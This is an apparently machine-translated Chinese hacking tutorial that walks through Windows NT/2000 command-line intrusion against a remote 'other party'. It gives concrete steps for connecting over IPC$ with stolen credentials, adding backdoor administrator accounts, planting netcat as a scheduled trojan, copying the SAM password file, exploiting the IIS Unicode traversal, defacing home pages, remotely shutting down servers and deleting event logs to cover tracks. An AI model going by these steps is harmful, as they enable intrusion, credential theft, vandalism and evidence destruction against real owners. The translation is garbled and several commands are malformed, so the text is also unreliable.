12 Network-related DOS Commands

1: Net

As long as you have the user name and password of an IP address, use IPC $ for connection!
Here we assume that the user you get is X 1 and the password is 123456. Assume that the Peer IP address is 127.0.0.1.
Net use // 127.0.0.1/IPC $123456/User: lxnull password is blank
The exit command is
Net use // 127.0.0.1/IPC $/delete
NET Share is to view the shared resources of the host. We use it to create a secret sharing directory. NET Share me = C:/winnt/system32 so that this machine has a shared directory named me, open it is the System32 directory under winnt. If you use the win2000 system, you will know how important this directory is. If you don't want it, you can also run net share me/Delete, no, is it very convenient.
The following operations can be used only after you log in. the login method is above.
The following describes how to create a user, because the SA permission is equivalent to the super user of the system.
We add a heibai User Password lovechina
Net user heibai lovechina/Add
As long as the command is displayed successfully, we can add it to the Administrator group.
Net localgroup administrators heibai/Add
Here we will talk about the disk C of the opposite party. Of course other disks can also be used as long as they exist. Here we will map the disk C of the other party to the local disk Z.
Net use Z: // 127.0.0.1/C $
Net start Telnet
In this way, you can open the telnet service of the other party.
Here we will activate the Guest user. The guest is the default user of NT and cannot be deleted? I don't know if this is the case. My 2000 won't be able to delete it.
Net user guest/active: Yes (Note: This Command Re-activates the previously disabled Guest account)
Net user guest/active: No. In this way, this guest user is disabled again.
Here we change the password of a user to lovechina. Other users can also change the password of guest. As long as you have the permission!
Net user guest lovechina
If someone asks about permission improvement, we can solve the problem below.
Net localgroup administrators guest/Add
Change guest to administrator
Net command is really powerful! . Net view command.
Net user is to view the list of all users, to see which user is stolen like you, and delete the user name to make him beautiful,
Net user username/delete Haha, he is no longer. Check whether he is an administrator. But let's check which users are in the Administrator group, so that users can be useful to us. Net localgroup administrators lists the members of the Administrator group. Then, let's look at the administrator user, because it was created when the system was created, so let's see when the system was created.
Net user administrator, and then check the time when other administrator users were created. If the difference is too far, it may be stolen by others, and Del is the only one, security First ................

2:

Generally, a hacker will leave a backdoor after intrusion, that is, a Trojan Horse. How can you start the trojan when you upload it?
Use the AT command. Assume that you have logged on to the server.
First, you need to get the time of the other party,
NET Time // 127.0.0.1
A time is returned. Assume that the time is. Now you need to create a new job with ID = 1.
At // 127.0.0.1 12:3 nc.exe
Assume that a trojan named NC. EXE is stored on the server of the other party.
NC is short for Netcat. It is renamed to facilitate input. It is a Telnet service and port is 99.
At, you can connect to the other party's port 99. In this way, a Trojan is planted for the other party.
The at command is powerful. For example:
C:/> at start C:/prettyboytasks
A new job is added with the job id = 1 [now we have a new job. The system will automatically play the song at]

3: Telnet

This command is very practical. It can be used to connect to a remote location, but the password and user are required normally, but you have planted a trojan for the other party and directly connected to the port opened by this trojan.
Telnet 127.0.0.1 99
In this way, you can connect to the other party's port 99. Then you can run the command on the other party, which is also a zombie.

4: ftp

It can upload your stuff to the other machine, and you can apply for a space that supports FTP upload. In China, if you cannot find it, I will www.51.net, which is good. after the application is completed, it will give the user name, password, and FTP server.
Before uploading, You need to log in first. Here we assume that the FTP service www.51.net, the user name is hucjs, And the password is 654321.
FTP www.51.net
He will ask the user to enter the password.
Next, let's talk about uploading. Assume that the file you want to upload is index. htm, which is located under C:/and uploaded to the other party's D :/
Get C:/index.htm D :/
Suppose you want to put index. htm under drive C of the other party to drive D of your machine.
Put C:/index.htm D :/
The problem here is that the explanations of the two commands are reversed. After logging on to the FTP server, get is the download, and put is the upload, which is the opposite of the TFTP Command, in the tftp command, "get" indicates uploading, put, and downloading. In addition, C:/and D:/cannot be used in the FTP server to specify the path, this is also the method used in TFTP. FTP won't be executed. If you don't believe it, you should try it. If it is correct, you should upload the file put index.htm, and then upload the index.htm file under the C-root directory to the current directory of the FTP server, if you do not like del index.htm, delete the file. When downloading the file, check the directory, Dir, and check what is in the directory, get index.htmand download the index.htm file to your own C root directory.
Get index.htm C:/inetpub/wwwroot/index.htm(this is to download the index.htm on your space to the other's C:/inetpub/wwwroot/index.htm )"

5: Copy

Next, let's talk about how to copy a local file to the hard disk of the other party. You need to establish an IPC $ connection.
Copy the index.htm under the C drive to the C drive of 127.0.0.1.
Copy index.htm // 127.0.0.1/C $/index.htm
If you want to copy C to drive D and change C to drive D, that's all!
Copy index.htm // 127.0.0.1/d $/index.htm
If you want to copy it to the WINNT directory
Input
Copy index.htm // 127.0.0.1/ADMIN $/index.htm
ADMIN $ is winnt
Copy the other party's file. By the way, we will tell you that the NT backup database is stored in X:/winnt/repair/SAM. _ Sam. _ is the database file name.
Copy the database of 127.0.0.1 to the local drive C.
Copy // 127.0.0.1/ADMIN $/repair/SAM. _ c :/
This Sam. _ is obviously the password file of the NT host. If it is the password file of the Win2000 machine, it should be Sam.

6: Set

If you run into a machine and want to blacklist him (this idea can only be available in special cases), of course, port 80 should be enabled, or you may want to blacklist him or her. In this case, use the set command!
The following is my result! I will analyze it, just find the home page.
Computername = PentiumII
Comspec = D:/winnt/system32/cmd.exe
Content_length = 0
Gateway_interface = cgi/1.1.
Http_accept = */*
Http_accept_language = ZH-CN
Http_connection = keep-alive
Http_host = IP address of the current login user. The IP address is displayed and deleted.
Http_accept_encoding = gzip, deflate
Http_user_agent = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; digext)
Number_of_processors = 1
Os2libpath = D:/winnt/system32/os2/DLL;
OS = windows_nt
Path = D:/winnt/system32; D:/winnt
Pathext =. com;. EXE;. BAT;. cmd
Path_translated = E:/vlroot home page address, as long as you see the address behind path_translated = is the home page storage address. Here is E:/vlroot
Processor_architecture = x86
Processor_identifier = x86 family 6 model 3 stepping 3, genuineintel
Processor_level = 6
Processor_revision = 0303
Prompt = $ p $ G
QUERY_STRING =/C + set
Remote_addr = xx. xx
Remote_host = xx. xx
Request_method = get
Script_ Name =/ScriptS/.. % 2f ../winnt/system32/cmd.exe
SERVER_NAME = xx. xx
Server_port = 80
Server_port_secure = 0
Server_protocol = http/1.1
Server_software = Microsoft-IIS/3.0 the other party uses IIS/3.0
Systemdrive = D:
Systemroot = D:/winnt
Z = GMT-9
USERPROFILE = D:/winnt/profiles/Default User
WINDIR = D:/winnt
The pink line is the address of the home page of the other party. This is a very stupid skill. However, you can only use this method to find the name of the home page in 100%, when you dir this directory, you will certainly see a lot of files, you can put all the files in the browser such as XX. XX. XX. XX/file name, as long as you see and XX. XX. XX. XX sees exactly the same face, so this is the name of the home page.

7: NBTSTAT

If you scan an NT host and one of the ports from 136 to 139 is enabled, you need to use this command to get the user. By the way, this is NetBIOS. You can guess the password after obtaining the user name. For example, you can try a simple password with the same password as the user name. If not, just crack it!
Now many nt hosts on the Internet have opened these ports. You can practice and analyze the results.
Command is
NBTSTAT-A xx. xx
-A must be capitalized.
In my opinion, there is no big difference between uppercase and lowercase letters, and the use is the same.
Then use the net use // ip address of the other party to connect!
Net view // view the shared folder of the Peer IP Address
Net use X: // ip/file shared by the other Party/* the shared folder of the other party becomes the X disk of the Local Machine
This is the basic usage of port 139! However, the premise is that you must share it with the other party!
Netstat-N to see who is connected to you
The following is the result.
NetBIOS remote machine name table
Name type status
Registered registered Reg
Istered registered
MAC address = 00-e0-29-14-35-ba
PentiumII <00> unique
PentiumII <20> unique
Orahotown <00> group
Orahotown <1C> group
Orahotown <1B> unique
PentiumII <03> unique
Inet ~ Services <1C> group
Is ~ PentiumII... <00> unique
Orahotown <1E> group
Orahotown <1D> unique
. _ Msbrowse _. <01> group
The pink one is the user who has logged on to this system. Maybe you don't know what to think. Do you see a number? As long as the number is <03>, the user is in front of him. here the user is PentiumII.
No 03 Note: Mac is not bundled with IP

8: Shutdown

Shut down the other's NT server command
Shutdown // ip address T: 20
In 20 seconds, NT will be automatically disabled, and this command can only be run after thinking twice. This will cause a great loss to the other party, and a conscientious hacker will be required.
Telnet in and use commands or local software to restart the other computer.
Shutdown-M // The computer name can be remotely restarted or disabled

9: Dir

This command has nothing to say but is very important. It is used to view all the files and folders in a directory.
You can try it locally.

10: Echo

The famous Unicode vulnerability, which can be used to easily hack hosts with this vulnerability.
Let's assume that we want to prove that "the Nanjing massacre is a mountain. No Japanese can afford it !" There are two methods to write data into index.htm. Let's see what the difference is.
Echo: the Nanjing massacre proves that no Japanese can afford it!> Index.htm
Echo: the Nanjing massacre proves that no Japanese can afford it!> Index.htm
The first idea is to overwrite the original content of index.htm and prove that "the Nanjing massacre is a mountain. No Japanese can afford it !" Enter index.htm.
The second is to prove that "the Nanjing massacre is like a mountain. No Japanese can afford it !" Add it to index.htm. ">" Will be appended to the file, and ">" will overwrite the original file.
Here, <and> is the redirection command, but one is the input redirection and the other is the output redirection. For example, we will display C at the command prompt: /> This means that the command weight of disk C is directed to us. Similarly, it is also called a pipeline. It is used to connect two command pipelines. First, execute the command on the left of the pipeline, execute the command on the right of the pipeline, but I can't explain the doscommand to the white. If I want to study it, I 'd like to buy a DOS book. It's enough for half a year.
You can try it locally.
You may ask, in this case, what is interesting? In fact, it can be used to download the home page to the directory of the other party.
1. First, we need to apply for a free home page.
2. Use echo to create a TXT file in a writable directory: (take the chinren server as an example .)
Open upload.chinaren.com)
Cnhack (user name when you apply)
Test (password when you apply)
Get index.htm C:/inetpub/wwwroot/index.htm(this is to download the index.htm on your space to the other's C:/inetpub/wwwroot/index.htm)
Bye (exit FTP conversation, equivalent to DoS under 98, exit dos with exit)
Specific Practices:
Input echo open upload.chinaren.com> C:/cnhack.txt
Input echo cnhack> C:/cnhack.txt
Input echo 39abs> C:/cnhack.txt
Input echo get index.htm C:/inetpub/wwwroot/index.htm +> + C:/cnhack.txt
Finally, enter FTP-S: C:/cnhack.txt (use the ftp-S parameter to execute the content in the file .)
When the command is complete, the file has been downloaded to your specified file.
Note: after obtaining the file, delete cnhack.txt. (If you do not delete the password, it is easy to show it to others .)
Remember Del C:/cnhack.txt

11: attrib

This command sets the file attributes. If you want to blacklist a website and set the file attribute of its home page to read-only, it will be very poor. If you want to delete it, you will not be able to overwrite it. Inverted! But don't be afraid of this command.
Attrib-r index.htm
This command removes the read-only attribute of index.htm.
If you change "-" to "+", the attribute of this file is set to read-only.
Attrib + R index.htm
This command sets the index.htm attribute to read-only.
The attrib command first needs to be used to query attributes, such as the attrib file name, so that the attributes of this file are displayed. It has more than the r attribute. In fact, there are four attributes in total, A file attribute R read-only attribute H implicit attribute s system attribute, which can be used if we want to use it. I think it is more interesting to add an implicit attribute to the uploaded file ,,,,, continue to pick the post error.

12: del

Don't fall down when you see this title! Now we are leaving 127.0.0.1. to delete the log, you must delete the log! Do you want to be caught. Haha.
NT logs have these
Del C:/winnt/system32/logfiles /*.*
Del C:/winnt/ssytem32/config/*. EVT
Del C:/winnt/system32/dtclog /*.*
Del C:/winnt/system32/*. Log
Del C:/winnt/system32/*. txt
Del C:/winnt/*. txt
Del C:/winnt/*. Log
You only need to delete these items. Some system nt must be installed on D or other disks, and C should be changed to another disk.
Default location of Internet information service ftp logs: % SystemRoot %/system32/logfiles/msftpsvc1/. One log is generated every day by default.
The default location of Internet Information Service WWW logs is % SystemRoot %/system32/logfiles/w3svc1/. One log is generated every day by default.
Default location of schedroot service logs: % SystemRoot %/schedlgu.txt
The keys of the above logs in the registry:
Application logs, security logs, system logs, and DNS server logs. These log files are in the registry:
HKEY_LOCAL_MACHINE/system/CurrentControlSet/services/EventLog
Some administrators may relocate these logs. There are many sub-tables under Eventlog, which can find the Location Directory of the above logs.
The schedluler Service Log is in the registry.
HKEY_LOCAL_MACHINE/software/Microsoft/schedulingagent
Del is indeed used to delete files, and logs are indeed the log file type. However, using the above method, you cannot clear your own logs because the system automatically runs log records, when you do this, it is always recorded and has not been stopped. You will often see that sometimes when you delete a file, the system will prompt you to reject deletion, this makes it clear that the system is running something that has already reside in the memory. Of course, you cannot delete it like this. You are afraid that deleting it will help others clean up the logs, I didn't delete my part. hahahahahahahahaha. I want to ask how to clean it up. I just want to say that everyone should use the tool of Xiao Rong. That is fast and good. Why should we use the cumbersome command lines, especially for those who have been operating on Windows desktops, it is obviously too troublesome. I recommend the elsave tool of Xiao Rong to clean up logs fast and clean, and save power, I am not advertising.
Third-party tools: for example, the elsave.exe of Xiaoyi can remotely clear system, applicaton, and security software,
It is easy to use. First, use the obtained Administrator Account to establish an IPC session with the other party. net use // ip pass/us
Er: User
Then run elsave-S // ip-l Application-C on the command line to delete the security log.
In fact, this software can also be used to back up logs. You only need to add a parameter-f filename, which will not be detailed here.
Should someone else crash on the lan? If the shared drive (Win98 with no patching) is enabled, enter
// His IP address or machine name/C/CON/con